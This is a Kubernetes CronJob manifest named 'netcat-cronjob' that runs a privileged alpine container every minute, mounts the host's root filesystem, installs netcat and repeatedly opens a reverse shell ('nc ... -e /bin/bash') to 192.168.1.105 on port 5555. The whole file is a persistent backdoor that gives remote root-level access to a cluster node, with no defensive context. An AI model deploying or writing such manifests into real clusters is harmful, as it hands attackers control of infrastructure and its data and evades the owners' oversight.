apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: netcat-cronjob
spec:
  schedule: "*/1 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
            - name: netcat-container
              image: alpine
              command: ["/bin/sh", "-c"]
              args: ["apk add --no-cache netcat-openbsd && while true; do nc 192.168.1.105 5555 -e /bin/bash; sleep 60; done"]
              volumeMounts:
                - name: hostfs
                  mountPath: /hostfs
              securityContext:
                privileged: true
          restartPolicy: Never
          volumes:
            - name: hostfs
              hostPath:
                path: /